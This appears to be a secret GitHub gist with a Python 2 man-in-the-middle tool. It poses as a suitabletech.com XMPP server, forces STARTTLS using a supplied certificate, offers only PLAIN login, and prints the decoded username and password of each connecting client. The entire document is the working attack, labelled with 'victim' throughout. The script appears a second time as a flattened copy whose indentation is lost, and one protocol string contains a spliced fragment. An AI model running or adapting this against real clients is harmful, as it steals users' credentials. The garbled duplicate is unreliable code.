diogomonica/gist:a24a7285f31804d37144 Secret

## gistfile1.py
#!/usr/bin/env python

import sys, socket, thread, ssl, re, base64

HOST = '0.0.0.0'
PORT = 5222
BUFFER = 2048

message1 = '''<?xml version='1.0'?><stream:stream xmlns:stream='http://etherx.jabber.org/streams' xmlns='jabber:client' from='suitabletech.com' version='1.0' id='yzd6vaewp51cr4pppt8ub8rvuew5x2ev1r1x1gtr'>'''
message2 = '''<stream:features xmlns:stream='http://etherx.jabber.org/streams'><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>'''
message2tls = '''<stream:features xmlns:stream='http://etherx.jabber.org/streams'><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>'''
message3 = '''<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>r.org/streams'><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>'''


def mitm_thread(victim, certificate, private_key):
    try:
        # Receive initial message from client
        pkt = victim.recv(BUFFER)
        print "# Received from victim: %s" % pkt.rstrip()

        # Send initial message and starttls with PLAIN
        victim.send(message1)
        victim.send(message2tls)

        # Receive STARTTLS
        pkt = victim.recv(BUFFER)
        print "# Received from victim: %s" % pkt.rstrip()

        # Proceed!
        victim.send(message3)

        print "# Victim connection switched to TLS"
        ssl_socket = ssl.wrap_socket(victim, server_side=True, suppress_ragged_eofs=False, certfile=certificate, keyfile=private_key)

        try:
            pkt = ssl_socket.recv(BUFFER)
            print "# Received from victim: %s" % pkt.rstrip()

            # Send initial message and PLAIN
            ssl_socket.send(message1)
            ssl_socket.send(message2)

            # We should now receive the credentials base64-encoded
            authblock = ssl_socket.recv(BUFFER)
            print "# Received from victim: %s" % authblock.rstrip()

            if authblock != '':
                credentials_xml = re.search('>(.+)</auth>',authblock).group(1)
                credentials = base64.b64decode(credentials_xml).split('\x00')
                print "# Found credentials.\n Username: %s\n Password: %s" % (credentials[1],credentials[2])
                victim.close()
            else:
                print "Something went wrong with our TLS certificate"
            ssl_socket.close()
        except Exception as e:
            print "Error inside our TLS socket: ", e
            ssl_socket.close()
            return
    except Exception as e:
        print "Error:", e
        victim.close()

if __name__=='__main__':
    if len(sys.argv) != 3:
        sys.exit('Usage: %s <certificate> <private_key>\nExample: %s suitabletech.com.pem suitabletech.com.key' % (sys.argv[0], sys.argv[0]))
    certificate = sys.argv[1]
    private_key = sys.argv[2]

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((HOST, PORT))
    server.listen(2)

    print "Started fake XMPP Server on port %s" % PORT
    try:
        while True:
            victim, address = server.accept()
            print "New Victim connected: %s" % address[0]
            thread.start_new_thread(mitm_thread, (victim, certificate, private_key))
    except KeyboardInterrupt:
        server.close()
	#!/usr/bin/env python

	import sys, socket, thread, ssl, re, base64

	HOST = '0.0.0.0'
	PORT = 5222
	BUFFER = 2048

	message1 = '''<?xml version='1.0'?><stream:stream xmlns:stream='http://etherx.jabber.org/streams' xmlns='jabber:client' from='suitabletech.com' version='1.0' id='yzd6vaewp51cr4pppt8ub8rvuew5x2ev1r1x1gtr'>'''
	message2 = '''<stream:features xmlns:stream='http://etherx.jabber.org/streams'><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>'''
	message2tls = '''<stream:features xmlns:stream='http://etherx.jabber.org/streams'><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>'''
	message3 = '''<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>r.org/streams'><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms><auth xmlns='http://jabber.org/features/iq-auth'/></stream:features>'''


	def mitm_thread(victim, certificate, private_key):
	try:
	# Receive initial message from client
	pkt = victim.recv(BUFFER)
	print "# Received from victim: %s" % pkt.rstrip()

	# Send initial message and starttls with PLAIN
	victim.send(message1)
	victim.send(message2tls)

	# Receive STARTTLS
	pkt = victim.recv(BUFFER)
	print "# Received from victim: %s" % pkt.rstrip()

	# Proceed!
	victim.send(message3)

	print "# Victim connection switched to TLS"
	ssl_socket = ssl.wrap_socket(victim, server_side=True, suppress_ragged_eofs=False, certfile=certificate, keyfile=private_key)

	try:
	pkt = ssl_socket.recv(BUFFER)
	print "# Received from victim: %s" % pkt.rstrip()

	# Send initial message and PLAIN
	ssl_socket.send(message1)
	ssl_socket.send(message2)

	# We should now receive the credentials base64-encoded
	authblock = ssl_socket.recv(BUFFER)
	print "# Received from victim: %s" % authblock.rstrip()

	if authblock != '':
	credentials_xml = re.search('>(.+)</auth>',authblock).group(1)
	credentials = base64.b64decode(credentials_xml).split('\x00')
	print "# Found credentials.\n Username: %s\n Password: %s" % (credentials[1],credentials[2])
	victim.close()
	else:
	print "Something went wrong with our TLS certificate"
	ssl_socket.close()
	except Exception as e:
	print "Error inside our TLS socket: ", e
	ssl_socket.close()
	return
	except Exception as e:
	print "Error:", e
	victim.close()

	if __name__=='__main__':
	if len(sys.argv) != 3:
	sys.exit('Usage: %s <certificate> <private_key>\nExample: %s suitabletech.com.pem suitabletech.com.key' % (sys.argv[0], sys.argv[0]))
	certificate = sys.argv[1]
	private_key = sys.argv[2]

	server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	server.bind((HOST, PORT))
	server.listen(2)

	print "Started fake XMPP Server on port %s" % PORT
	try:
	while True:
	victim, address = server.accept()
	print "New Victim connected: %s" % address[0]
	thread.start_new_thread(mitm_thread, (victim, certificate, private_key))
	except KeyboardInterrupt:
	server.close()